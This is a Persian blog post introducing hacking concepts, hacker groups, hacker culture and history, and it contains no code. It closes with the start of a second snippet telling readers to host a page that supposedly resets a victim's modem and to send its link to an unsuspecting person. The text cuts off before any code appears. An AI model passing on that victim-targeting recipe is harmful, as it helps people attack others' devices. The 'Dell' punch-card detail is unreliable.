ﺗﺤﺴﯿﻦﺷﺪﻥ ﺑﺪﻟﯿﻞ ﻣﺎﺟﺮﺍﻫﺎﯾﯽ ﮐﻪ ﺑﻮﺟﻮﺩ ﻣﯽﺁﻭﺭﻧﺪ، ﻟﺬﺕ ﻣﯽﺑﺮﻧﺪ . ﺑﯿﺸﺘﺮ ﺁﻧﻬﺎ ﺍﺯ ﺍﺳﺎﻣﯽ ﻣﺴﺘﻌﺎﺭ ﻣﺎﻧﻨﺪ Hackingwiz ﯾﺎ Hyper Viper ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽﮐﻨﻨﺪ . ﺁﻧﻬﺎ ﺧﻮﺩ ﺭﺍ ﺍﻓﺮﺍﺩ ﻣﺎﻫﺮ ﻭ ﻫﻨﺮﻣﻨﺪﯼ ﻣﯽﺩﺍﻧﻨﺪ ﮐﻪ ﮔﺎﻫﯽ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻭﯾﺮﻭﺱﻧﻮﯾﺴﺎﻥ ﺟﺪﺍ ﻣﯽﮐﻨﻨﺪ . ﺩﺭ ﺣﻘﯿﻘﺖ، ﺑﺮﺍﯼ ﻣﺸﺨﺺﮐﺮﺩﻥ ﯾﮏ ﻫﮑﺮ، ﺗﻌﺮﯾﻒ ﻣﺸﺨﺼﯽ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ . ﺁﻧﻬﺎ ﺩﺍﺭﺍﯼ ﺯﻣﯿﻨﻪﻫﺎﯼ ﻣﺘﻔﺎﻭﺗﯽ ﻫﺴﺘﻨﺪ ﻭ ﺩﻻﯾﻠﯽ ﮐﻪ ﭘﺸﺖ ﻫﮏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮔﺴﺘﺮﻩ ﻭﺳﯿﻌﯽ ﺭﺍ ﻣﯽﭘﻮﺷﺎﻧﺪ، ﺍﻣﺎ ﺑﺎﻋﺚ ﺗﻬﺪﯾﺪﻫﺎﯼ ﻣﺸﺘﺮﮐﯽ ﻣﯽﺷﻮﻧﺪ . ﻫﮑﺮﻫﺎ ﺍﻓﺮﺍﺩ ﺑﺎﻫﻮﺷﯽ ﻫﺴﺘﻨﺪ ﻭ ﺍﺯ ﺍﯾﻨﮑﻪ ﮐﺎﻣﭙﯿﻮﺗﺮﻫﺎ ﺭﺍ ﺑﻪ ﺍﻧﺠﺎﻡ ﮐﺎﺭﯼ ﮐﻪ ﺩﻭﺳﺖ ﺩﺍﺭﻧﺪ ﻭﺍﻣﯽﺩﺍﺭﻧﺪ، ﻟﺬﺕ ﻣﯽﺑﺮﻧﺪ . ● ﻃﺒﻘﻪﺑﻨﺪﯼ ﻫﮑﺮﻫﺎ ﺩﺭ ﻃﺒﻘﻪﺑﻨﺪﯼ ﻫﮑﺮﻫﺎ ﺳﻪ ﮔﺮﻭﻩ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ : ▪ ﮔﺮﻭﻩ ﺍﻭﻝ : ﻫﮑﺮﻫﺎﯼ ﻣﺪﺭﺳﻪﺍﯼ ﻗﺪﯾﻤﯽ ﮐﻪ ﺑﻪ ﺩﺍﺩﻩﻫﺎﯼ ﻓﻨﯽ ﻣﺎﻧﻨﺪ ﮐﺪﻫﺎﯼ ﺑﺮﻧﺎﻣﻪ ﯾﺎ ﺁﻧﺎﻟﯿﺰ ﺳﯿﺴﺘﻤﻬﺎ ﻋﻼﻗﻤﻨﺪ ﻫﺴﺘﻨﺪ . ﺍﯾﻦ ﮔﺮﻭﻩ ﻋﻼﻗﻤﻨﺪ ﺑﻪ ﺩﺭﮔﯿﺮﺷﺪﻥ ﺩﺭ ﺗﺤﺼﯿﻼﺕ ﻋﺎﻟﯿﻪ ﻣﺮﺗﺒﻂ ﺑﺎ ﻋﻠﻮﻡ ﮐﺎﻣﭙﯿﻮﺗﺮ ﻫﺴﺘﻨﺪ . ▪ ﮔﺮﻭﻩ ﺩﻭﻡ ﮔﺮﻭﻩ ﺩﻭﻡ ﻫﮑﺮﻫﺎﯾﯽ ﻫﺴﺘﻨﺪ ﮐﻪ ﺑﻪ ﻣﺠﺮﻣﺎﻥ ﺷﺒﺎﻫﺖ ﺑﯿﺸﺘﺮﯼ ﺩﺍﺭﻧﺪ . ﺁﻧﻬﺎ ﺩﺭ ﻓﻀﺎﯼ ﻭﺏ ﻣﯽﮔﺮﺩﻧﺪ ﻭ ﺑﺮﺍﯼ ﺍﺛﺒﺎﺕ ﺧﻮﺩﺷﺎﻥ ﺳﺎﯾﺘﻬﺎ ﺭﺍ ﻫﮏ ﻣﯽﮐﻨﻨﺪ ﻭ ﻣﺴﺎﻟﻪﺳﺎﺯ ﻣﯽﺷﻮﻧﺪ . ﺑﻬﺮﺣﺎﻝ ﺍﺧﯿﺮﺍ، ﺗﻌﺪﺍﺩﺷﺎﻥ ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﺑﯿﺸﺘﺮﯼ ﺑﻪ ﻫﮏ ﻣﺸﻐﻮﻝ ﺷﺪﻩﺍﻧﺪ . ﺍﯾﻦ ﻣﺴﺎﻟﻪ ﺑﻌﺒﺎﺭﺗﯽ ﺣﺎﻟﺖ ﺗﻔﺮﯾﺢ ﺩﺭ ﻓﻀﺎﯼ ﺳﺎﯾﺒﺮ ﺭﺍ ﺑﺮﺍﯼ ﺁﻧﻬﺎ ﺩﺍﺭﺩ . ﺁﻧﻬﺎ ﺍﺑﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺗﻮﺳﻂ ﺭﻭﺷﻬﺎ ﻭ ﻫﮑﻬﺎﯾﯽ ﮐﻪ ﺍﺯ ﻣﻨﺎﺑﻊ ﻏﯿﺮﻗﺎﻧﻮﻧﯽ، ﻣﺎﻧﻨﺪ ﻭﺏﺳﺎﯾﺘﻬﺎﯾﯽ ﮐﻪ ﺑﻪ ﻫﮏ ﺗﺨﺼﯿﺺﯾﺎﻓﺘﻪ، ﺑﺪﺳﺖ ﻣﯽﺁﻭﺭﻧﺪ . ﺍﯾﻦ ﺍﻓﺮﺍﺩ ﺑﺮﺍﯼ ﺟﺎﻣﻌﻪ ﺍﻣﻨﯿﺘﯽ ﺍﻣﺮﻭﺯ ﻣﺴﺎﻟﻪﺍﯼ ﺟﺪﯼ ﻣﺤﺴﻮﺏ ﻣﯽﺷﻮﻧﺪ . ▪ ﮔﺮﻭﻩ ﺳﻮﻡ ﮔﺮﻭﻩ ﺳﻮﻡ ﻣﺠﺮﻣﺎﻥ ﺣﺮﻓﻪﺍﯼ ﻫﺴﺘﻨﺪ . ﺍﻓﺮﺍﺩ ﺍﯾﻦ ﮔﺮﻭﻩ ﺍﻏﻠﺐ ﺍﻫﺪﺍﻑ ﻣﺎﻟﯽ ﺩﺍﺭﻧﺪ . ﺁﻧﻬﺎ ﻣﻬﺎﺭﺕ ﺩﺳﺘﺮﺳﯽ ﺑﻪ ﺳﯿﺴﺘﻤﻬﺎﯼ ﻣﻮﺭﺩ ﻫﮏ ﻭ ﯾﺎ ﺍﻓﺮﺍﺩ ﺑﺎ ﺍﯾﻦ ﺗﻮﺍﻧﺎﯾﯽ ﺭﺍ ﺩﺍﺭﻧﺪ . ● ﻓﺮﻫﻨﮓ ﻫﮑﺮﻫﺎ ﺩﺭ ﻓﺮﻫﻨﮓ ﻫﮑﺮﻫﺎ، ﯾﮏ “ ﺁﯾﯿﻦ ﻫﮑﺮﯼ ” ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﺩﺭ ﺣﻘﯿﻘﺖ ﻣﺠﻤﻮﻋﻪﺍﯼ ﺍﺯ ﻗﻮﺍﻧﯿﻦ ﻧﺎﻧﻮﺷﺘﻪﺍﯼ ﺍﺳﺖ ﮐﻪ ﻓﻌﺎﻟﯿﺘﻬﺎﯼ ﺁﻧﻬﺎ ﺭﺍ ﻫﺪﺍﯾﺖ ﻣﯽﮐﻨﺪ ﻭ ﺧﻂ ﻣﺸﯽ ﺁﻧﻬﺎ ﺭﺍ ﺗﻌﯿﯿﻦ ﻣﯽﮐﻨﺪ . ﻣﻬﻤﺘﺮ ﺍﯾﻨﮑﻪ، ﺍﯾﻦ ﻣﺠﻤﻮﻋﻪ ﺑﻪ ﺗﺎﯾﯿﺪ ﻓﻌﺎﻟﯿﺘﻬﺎﯼ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﻮﺳﻂ ﻫﮑﺮﻫﺎ ﮐﻤﮏ ﻣﯽﮐﻨﺪ . ﻫﺮ ﮔﺮﻭﻩ ﺑﺮﺍﯼ ﺧﻮﺩ ﯾﮏ ﺁﯾﯿﻦ ﻫﮑﺮﯼ ﺩﺍﺭﺩ ﮐﻪ ﺍﺯ ﺁﻥ ﺗﺒﻌﯿﺖ ﻣﯽﮐﻨﺪ . ﻣﻄﺎﺑﻖ ﺑﺎ ﺩﯾﺪﮔﺎﻩ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ، ﻫﮑﺮﻫﺎ ﯾﺎ ﺳﻮﺩﻣﻨﺪ ﻭ ﺑﻌﻨﻮﺍﻥ ﺟﺰﺀ ﻻﺯﻣﯽ ﺑﺮﺍﯼ ﺍﯾﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ، ﯾﺎ ﺍﯾﻨﮑﻪ ﺗﻬﺪﯾﺪ ﻣﺤﺴﻮﺏ ﻣﯽﺷﻮﻧﺪ . ﺑﺴﯿﺎﺭﯼ ﺍﺣﺴﺎﺱ ﻣﯽﮐﻨﻨﺪ ﮐﻪ ﺁﻧﻬﺎ ﻭﻇﯿﻔﻪ ﺩﺍﺭﻧﺪ ﺷﮑﺎﻓﻬﺎﯼ ﺍﻣﻨﯿﺘﯽ ﺭﺍ ﭘﯿﺪﺍ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ ﺗﺎ ﺗﻮﺟﻪ ﻻﺯﻡ ﺭﺍ ﺑﻪ ﻣﺴﺎﻟﻪ ﻣﻌﻄﻮﻑ ﺩﺍﺭﻧﺪ . ﺑﻬﺮﺣﺎﻝ ﺑﺎﯾﺪ ﺭﻭﯼ ﺩﯾﮕﺮ ﺳﮑﻪ ﺭﺍ ﻧﯿﺰ ﺩﯾﺪ . ﻫﻤﺎﻥ ﺍﺑﺰﺍﺭﯼ ﮐﻪ ﺑﺮﺍﯼ ﺍﻫﺪﺍﻑ ﺧﻮﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽﺷﻮﺩ ﻣﯽﺗﻮﺍﻧﺪ ﻫﻤﭽﻨﯿﻦ ﺑﺎﻋﺚ ﺯﯾﺎﻥ ﯾﺎ ﺳﻮﺀﺍﺳﺘﻔﺎﺩﻩﻫﺎﯼ ﺷﺨﺼﯽ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﯾﮕﺮ ﺷﻮﺩ . ﻫﻤﭽﻨﯿﻦ ﺑﻪ ﺍﯾﻦ ﻃﺮﯾﻖ ﻫﺰﯾﻨﻪﻫﺎﯼ ﺍﯾﻨﺘﺮﻧﺖ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻟﺰﻭﻡ ﺍﻓﺰﺍﯾﺶ ﺍﻣﻨﯿﺖ ﺭﻭﯼ ﻭﺏ، ﺍﻓﺰﺍﯾﺶ ﻣﯽﯾﺎﺑﺪ . ● ﺳﺎﯾﺘﻬﺎ ﻫﮏ ﻭ ﻫﮑﯿﻨﮓ ﮔﺮﻭﻩﻫﺎ ﻭ ﺳﺎﯾﺘﻬﺎﯾﯽ ﻫﺴﺘﻨﺪ ﮐﻪ ﺍﺑﺰﺍﺭ ﻫﮏ ﺭﺍ ﺩﺭ ﺍﺧﺘﯿﺎﺭ ﺍﻓﺮﺍﺩ ﻗﺮﺍﺭ ﻣﯽﺩﻫﻨﺪ . ﻫﺪﻑ ﺑﻌﻀﯽ ﺍﺯ ﺁﻧﻬﺎ ﻧﯿﺰ ﺍﻃﻼﻉﺭﺳﺎﻧﯽ ﺑﺮﺍﯼ ﺟﻠﻮﮔﯿﺮﯼ ﺍﺯ ﺁﺳﯿﺐﻫﺎﯼ ﺍﺣﺘﻤﺎﻟﯽ ﺍﺳﺖ . ﮔﺎﻫﯽ ﻓﻌﺎﻟﯿﺘﻬﺎﯼ ﻫﮑﯽ ﺭﺍ ﮐﻪ ﺩﺭ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﺳﺖ ﺑﻪ ﺍﻃﻼﻉ ﻋﻤﻮﻡ ﻣﯽﺭﺳﺎﻧﻨﺪ . ﺑﻪ ﻫﺮﺣﺎﻝ ﺷﺎﯾﺎﻥ ﺫﮐﺮ ﺍﺳﺖ ﮐﻪ ﻫﻤﭽﻨﺎﻥ ﺑﯿﻦ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﯿﺖ ﺍﺧﺘﻼﻑ ﻧﻈﺮ ﺩﺭ ﻣﻮﺭﺩ ﺳﻮﺩﺭﺳﺎﻧﯽ ﯾﺎ ﺿﺮﺭﺭﺳﺎﻧﯽ ﻫﮑﺮﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ . ﺟﺎﻟﺐ ﺍﯾﻨﺠﺎﺳﺖ ﮐﻪ ﮔﺎﻫﯽ ﻫﮑﺮﻫﺎ ﺍﻗﺪﺍﻡ ﺑﻪ ﺑﺮﮔﺰﺍﺭﯼ ﻫﻤﺎﯾﺶ ﻧﯿﺰ ﻣﯽﮐﻨﻨﺪ ﻭ ﺍﻓﺮﺍﺩ ﻋﻼﻗﻤﻨﺪ ﺑﺎ ﺣﻀﻮﺭ ﺩﺭ ﺍﯾﻦ ﻫﻤﺎﯾﺸﻬﺎ ﺑﺎ ﺭﻭﺷﻬﺎ ﻭ ﺍﺑﺰﺍﺭ ﻫﮏ ﺁﺷﻨﺎ ﻣﯽﺷﻮﻧﺪ . ﺍﻟﺒﺘﻪ ﺩﺭ ﻣﯿﺎﻥ ﺣﺎﺿﺮﯾﻦ ﺑﺎﺯ ﻫﻢ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﯿﺖ ﻭ ﻧﯿﺰ ﺁﮊﺍﻧﺲﻫﺎﯼ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﯼ ﻭ ﻣﺠﺮﯾﺎﻥ ﻗﺎﻧﻮﻥ ﺣﻀﻮﺭ ﺩﺍﺭﻧﺪ . ﻫﺪﻑ ﺁﻧﻬﺎ ﺍﺯ ﺍﯾﻦ ﺣﻀﻮﺭ ﺣﺼﻮﻝ ﺩﺍﻧﺶ ﺑﻬﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﯾﻦ ﻣﻮﺿﻮﻉ ﻭ ﮐﺴﺐ ﻣﻬﺎﺭﺗﻬﺎﯼ ﺑﯿﺸﺘﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﮔﺮﺍﯾﺶ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺑﻪ ﺟﺮﺍﯾﻢ ﻭ ﺗﺮﻭﺭﯾﺴﻢ ﺩﺭ ﻓﻀﺎﯼ ﺳﺎﯾﺒﺮ ﺍﺳﺖ . ● ﺗﺎﺭﯾﺦ ﻭﺭﺍﯼ ﻗﻀﯿﻪ ؛ ﺗﺎﺭﯾﺨﭽﻪ ﻫﮏ ﻭ ﻫﮑﺮ ﻫﺎ ﻫﮏ ﺍﺣﺘﻤﺎﻻ ﻋﻤﺮﯼ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋﻤﺮ ﮐﺎﻣﭙﯿﻮﺗﺮ ﺩﺍﺭﺩ . ﺭﻭﺯ ﺍﻭﻝ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﮐﺎﺭ ﻣﯽﮐﺮﺩ ﻭ ﺭﻭﺯ ﺩﻭﻡ ﻫﮏ ﻣﯽﺷﺪ . MIT ﺍﻭﻟﯿﻦ ﮔﺮﻭﻩ ﺍﺯ ﻫﮑﺮﻫﺎﯼ ﮐﺎﻣﭙﯿﻮﺗﺮﯼ ﺭﺍ ﻣﻌﺮﻓﯽ ﮐﺮﺩ . ﮔﺮﻭﻫﯽ ﺟﻮﺍﻥ ﺍﺯ ﺗﺤﺼﯿﻠﮑﺮﺩﮔﺎﻥ ﻋﻠﻮﻡ ﮐﺎﻣﭙﯿﻮﺗﺮ ﮐﻪ ﺭﻭﯼ ﻣﺎﺷﯿﻦ ﮐﺎﺭﺕ ﭘﺎﻧﭻ Dell ﮐﺎﺭ ﻣﯽﮐﺮﺩﻧﺪ . ﺑﻬﺮﺣﺎﻝ ﺍﯾﻦ ﻫﻨﺮ ! ﻫﯿﭻ ﻣﺮﺯ ﺑﯿﻦﺍﻟﻤﻠﻠﯽ ﻧﻤﯽﺷﻨﺎﺳﺪ . ﻫﮏ ﺩﺭ ﻫﻤﻪ ﺟﺎ ﻫﺴﺖ . ﺑﺎ ﻇﻬﻮﺭ ﺍﯾﻨﺘﺮﻧﺖ ﻣﺪﺭﻥ، ﻫﮏ ﻧﯿﺰ ﺭﺷﺪ ﮐﺮﺩ . ﻫﮏ ﺑﯿﺸﺘﺮ ﺑﻌﻨﻮﺍﻥ ﯾﮏ ﻫﻮﯾﺖ ﻣﺴﺘﻘﻞ ﻇﻬﻮﺭ ﮐﺮﺩ . ﺭﻭﺗﺮﻫﺎ ﺑﺪﺭﺳﺘﯽ ﺗﻨﻈﯿﻢ ﻧﻤﯽﺷﺪﻧﺪ، ﻫﻤﭽﻨﺎﻧﮑﻪ ﺍﯾﻦ ﻣﺴﺎﻟﻪ ﺍﻣﺮﻭﺯ ﻧﯿﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ . ﻣﻌﻤﻮﻻ ﮐﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺑﺮﺍﯼ ﺩﺳﺘﯿﺎﺑﯽ ﺑﻪ ﺷﺮﮐﺘﻬﺎﯼ ﺑﺰﺭﮒ ﺩﻭﻟﺘﯽ ﻭ ﺍﺭﺗﺸﯽ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽﮐﺮﺩﻧﺪ . ﻭ ﺑﻘﯿﻪ ﻧﯿﺰ ﭘﺸﺖ ﺗﺮﻣﯿﻨﺎﻟﻬﺎﯾﯽ ﻣﯽﻧﺸﺴﺘﻨﺪ ﮐﻪ ﻣﺴﺘﻘﯿﻤﺎ ﺑﻪ ﺳﯿﺴﺘﻤﻬﺎﯾﯽ ﻭﺻﻞ ﺑﻮﺩﻧﺪ ﮐﻪ ﺁﻧﻬﺎ ﺩﺭ ﺣﺎﻝ ﻫﮏ ﮐﺮﺩﻧﺸﺎﻥ ﺑﻮﺩﻧﺪ . ﺍﯾﻦ ﺳﯿﺴﺘﻤﻬﺎ ﺍﺯ ﻣﺎﺷﯿﻨﻬﺎﯼ ﻣﯿﻦﻓﺮﯾﻢ ﺑﺰﺭﮒ ﻭ ﺩﺭﺍﯾﻮﻫﺎﯼ ﻧﻮﺍﺭﯼ ﺗﺸﮑﯿﻞ ﻣﯽﺷﺪﻧﺪ . ﺩﺳﺘﺮﺳﯽ ﺑﻪ ﺁﻧﻬﺎ ﻋﻤﻮﻣﺎ ﺑﺎ ﻫﮏ ﮐﺮﺩﻥ ﮐﻤﺘﺮﯾﻦ ﻣﯿﺰﺍﻥ ﺍﻣﻨﯿﺖ ﯾﻌﻨﯽ ﺷﻨﺎﺳﻪ ﻭ ﺭﻣﺰﻋﺒﻮﺭ ﺑﺪﺳﺖ ﻣﯽﺁﻣﺪ . ﺍﻟﺒﺘﻪ ﻣﻨﻈﻮﺭ ﺍﯾﻦ ﻧﯿﺴﺖ ﮐﻪ ﻫﮏ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ ﺁﺳﺎﻧﺘﺮ ﺑﻮﺩ . ﻣﯿﺎﻧﮕﯿﻦ ﺳﻄﺢ ﺩﺍﻧﺶ ﻫﮑﺮﻫﺎ ﻧﯿﺰ ﺑﺎﻻﺗﺮ ﺭﻓﺘﻪ ﺍﺳﺖ . ﺩﺭ ﺿﻤﻦ ﺍﻣﺮﻭﺯﻩ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﯼ ﺁﺳﯿﺐﺭﺳﺎﻥ ﻧﯿﺰ ﺑﺮﺍﺣﺘﯽ ﺩﺭ ﺩﺳﺘﺮﺱ ﺍﻓﺮﺍﺩ ﺑﺎ ﺩﺍﻧﺶ ﮐﻢ ﻗﺮﺍﺭ ﺩﺍﺭﺩ . ﻫﺪﻑ ﺍﺯ ﺑﺴﯿﺎﺭﯼ ﻧﻔﻮﺫﻫﺎ ﺩﺳﺘﯿﺎﺑﯽ ﺑﻪ ﺳﯿﺴﺘﻤﻬﺎﯾﯽ ﺑﻮﺩ ﮐﻪ ﺑﻨﻈﺮ ﻏﯿﺮﻗﺎﺑﻞ ﺩﺳﺘﯿﺎﺑﯽ ﯾﺎ ﺍﻣﻦ ﺑﻮﺩﻧﺪ . ﺩﺭ ﺣﻘﯿﻘﺖ ﺷﮑﺴﺘﻦ ﺍﻣﻨﯿﺖ ﺍﯾﻦ ﺳﯿﺴﺘﻤﻬﺎ ﯾﮏ ﭼﺎﻟﺶ ﻣﺤﺴﻮﺏ ﻣﯽﺷﺪ . ● ﻫﮏ ﺩﺭ ﺩﻧﯿﺎﯼ ﺍﻣﺮﻭﺯ ﺍﻣﺮﻭﺯﻩ ﺩﺭ ﺩﻧﯿﺎﯾﯽ ﺯﻧﺪﮔﯽ ﻣﯽﮐﻨﯿﻢ ﮐﻪ ﺍﯾﻨﺘﺮﻧﺖ ﺑﺨﺶ ﻣﻬﻤﯽ ﺍﺯ ﺁﻥ ﺭﺍ ﺗﺸﮑﯿﻞ ﻣﯽﺩﻫﺪ . ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﺧﺮﯾﺪﻫﺎ ﺁﻧﻼﯾﻦ ﺍﻧﺠﺎﻡ ﻣﯽﮔﯿﺮﺩ ﻭ ﺳﯿﺴﺘﻤﻬﺎﯼ ﺗﺠﺎﺭﯼ ﺯﯾﺎﺩﯼ ﺍﺯ ﺍﯾﻦ ﻃﺮﯾﻖ ﺑﻪ ﻫﻢ ﻣﺮﺗﺒﻂ ﻫﺴﺘﻨﺪ . ﻇﻬﻮﺭ ﮐﺎﻣﭙﯿﻮﺗﺮﻫﺎﯼ ﺭﻭﻣﯿﺰﯼ ﻭ ﺍﻓﺰﺍﯾﺶ ﺁﻧﻬﺎ ﺩﺭ ﺧﺎﻧﻪﻫﺎ، ﮐﺎﻣﭙﯿﻮﺗﺮ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﮔﺮﻭﻩﻫﺎﯼ ﺯﯾﺎﺩﯼ ﺍﺯ ﻣﺮﺩﻡ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ . ﺍﯾﻦ ﺍﻣﺮ ﺯﻣﯿﻨﻪ ﺭﺍ ﺑﺮﺍﯼ ﻓﻌﺎﻟﯿﺖ ﻫﮑﺮﻫﺎ ﻧﯿﺰ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﺍﺳﺖ . ﺍﮔﺮﭼﻪ ﻫﮑﺮﻫﺎ ﺑﺎ ﮐﺎﻣﭙﯿﻮﺗﺮﻫﺎ ﻭ ﺷﺒﮑﻪﻫﺎﯼ ﭘﯿﭽﯿﺪﻩﺗﺮﯼ ﺳﺮﻭﮐﺎﺭ ﺩﺍﺭﻧﺪ، ﺧﻮﺩ ﺍﯾﻦ ﺍﻣﺮ ﭼﺎﻟﺶ ﻗﻀﯿﻪ ﺭﺍ ﺑﺮﺍﯼ ﺁﻧﻬﺎ ﺑﯿﺸﺘﺮ ﻣﯽﮐﻨﺪ ﻭ ﺍﻧﮕﯿﺰﻩ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﻻﺗﺮ ﻣﯽﺑﺮﺩ . ﺳﯿﺎﺳﺖﻫﺎ ﻭ ﻓﻠﺴﻔﻪﻫﺎﯼ ﭘﺸﺖ ﺍﯾﻦ ﻗﻀﯿﻪ ﻧﯿﺰ ﺗﻐﯿﯿﺮ ﮐﺮﺩﻩ ﺍﺳﺖ . ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﮔﺮﻭﻩﻫﺎ ﺍﺯ ﻫﮑﺮﻫﺎ ﺑﺮﺍﯼ ﮐﻤﮏ ﺑﻪ ﮐﺸﻒ ﺿﻌﻔﻬﺎﯼ ﺍﻣﻨﯿﺘﯽ ﺳﯿﺴﺘﻤﻬﺎﯼ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽﮐﻨﻨﺪ . ﺍﯾﻨﺘﺮﻧﺖ ﻣﺪﺭﻥ ﺑﻪ ﻫﮑﺮﻫﺎ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺍﺳﺖ ﮐﻪ ﻣﺮﺯﻫﺎﯼ ﺟﺪﯾﺪ ﺭﺍ ﺑﮑﺎﻭﻧﺪ . ﺟﻨﮓ ﺑﯿﻦ ﮐﺸﻮﺭﻫﺎ ﺑﺎ ﻫﮏﮐﺮﺩﻥ ﻭﺏﺳﺎﯾﺘﻬﺎﯼ ﯾﮑﺪﯾﮕﺮ ﻭ ﺍﺯ ﮐﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺁﻧﻬﺎ ﯾﺎ ﭘﺎﯾﯿﻦﺁﻭﺭﺩﻥ ﺳﺎﯾﺘﻬﺎ ﺑﺎ ﺣﻤﻼﺕ DoS (Denial of Service ) ﺑﻪ ﯾﮏ ﺍﻣﺮ ﻣﻌﻤﻮﻝ ﻣﺒﺪﻝ ﮔﺸﺘﻪ ﺍﺳﺖ . ﺍﺭﺗﺸﻬﺎ ﺍﺯ ﻫﮑﺮﻫﺎ ﺑﻤﻨﻈﻮﺭ ﺍﺯ ﮐﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﯿﺴﺘﻤﻬﺎﯼ ﺩﻓﺎﻋﯽ ﺩﺷﻤﻨﺎﻧﺸﺎﻥ ﺑﺮﺍﯼ ﮐﺴﺐ ﺑﺮﺗﺮﯼ ﺩﺭ ﺟﻨﮓ ﺍﺳﺘﻔﺎﺩﻩ ﻣﯽﮐﻨﻨﺪ . ﻣﻨﺎﻓﻊ ﻣﺎﻟﯽ ﯾﮏ ﺍﻧﮕﯿﺰﻩ ﺑﺰﺭﮒ ﺑﺮﺍﯼ ﺑﻌﻀﯽ ﻫﮑﺮﻫﺎ ﯾﺎ ﺍﻓﺮﺍﺩﯼ ﺍﺳﺖ ﮐﻪ ﻫﮑﺮﻫﺎ ﺭﺍ ﺑﮑﺎﺭ ﻣﯽﮔﯿﺮﻧﺪ . ﻣﻮﺳﺴﺎﺕ ﻣﺎﻟﯽ ﺍﻏﻠﺐ ﻫﺪﻑ ﻗﺮﺍﺭ ﻣﯽﮔﯿﺮﻧﺪ ﺗﺎ ﻣﻘﺎﺩﯾﺮ ﺯﯾﺎﺩﯼ ﺍﺯ ﭘﻮﻟﺸﺎﻥ ﺗﻮﺳﻂ ﺭﻭﺷﻬﺎﯼ ﺍﻟﮑﺘﺮﻭﻧﯿﮏ ﺑﺴﺮﻗﺖ ﺭﻭﺩ

برچسب: ﺗﻌﺮﯾﻒ ﻣﺒﺎﻧﯽ ﻭ ﻣﻔﺎﻫﯿﻢ ﻭ ﺗﺎﺭﯾﺨﭽﻪ ﻫﮏ ﻭ ﻓﺮﻫﻨﮓ ﻫﮑﺮﻫﺎ ﺩﺭ ﺍﯾﻨﺘﺮﻧﺖ , نویسنده: SASHA PAYDAR تاريخ: دوشنبه 9 شهريور 1394 ساعت: 8:53

ﺧﺐ ﯾﮏ ﺍﻣﻮﺯﺵ ﺗﻮﭖ ﻣﯿﺪﻡ ﺑﺮﺍﯼ ﺭﯾﺴﺖ ﮐﺮﺩﻥ ﮐﺴﯽ ﮎ ﻣﯿﺨﺎﯾﻦ ﺣﺎﻟﺸﻮ ﺑﮕﯿﺮﯾﻦ ﺍﯾﻦ ﮐﺪ ﺭﻭ ﮐﭙﯽ ﮐﻨﯿﻦ ﺩﺭ ﯾﮏ ﻓﺎﯾﻞ txt ﻭ save as ﮐﻨﯿﻦ ﺑﺎ ﭘﺴﻮﻧﺪ html ﯾﺎ php ﺫﺧﯿﺮﻩ ﮐﻨﯿﻦ ﻭ ﺩﺭ ﯾﮏ ﺟﺎ ﺁﭘﻠﻮﺩ ﮐﻨﯿﻦ ﻣﺜﻞ ﻫﺎﺳﺖ ﺭﺍﯾﮕﺎﻥ ﻭ ﺑﻌﺪ ﻟﯿﻨﮑﺸﻮ ﺑﻪ ﯾﮏ ﺑﺪﺑﺨﺖ ﺑﺪﯾﻦ ﻣﻮﺩﻣﺶ ﺭﯾﺴﺖ ﻣﯿﺸﻪ ﺷﺎﯾﺪ ﮐﺪﺷﻪ ﺭﻭ ﺩﯾﺪﻩ ﺑﺎﺷﯿﻦ ﻭﻟﯽ ﺑﺮﺍﯼ ﺍﯾﻦ ﺯﺩﻡ ﮐﻪ ﺑﻌﻀﯽ ﺣﺮﻓﺎ ﺭﻭ ﻭ ﻓﮑﺮﺍ ﺭﻭ ﻧﺴﺒﺖ ﺑﻪ ﺍﯾﻦ ﻋﻮﺽ ﮐﻨﻢ ﻣﯿﺘﻮﻧﯿﺪ ﺍﯾﻦ ﮐﺪ ﺭﻭ ﺩﺭﻭﻥ ﺻﻔﺤﺎﺕ Html , php ﯾﺎ ﻫﺮ 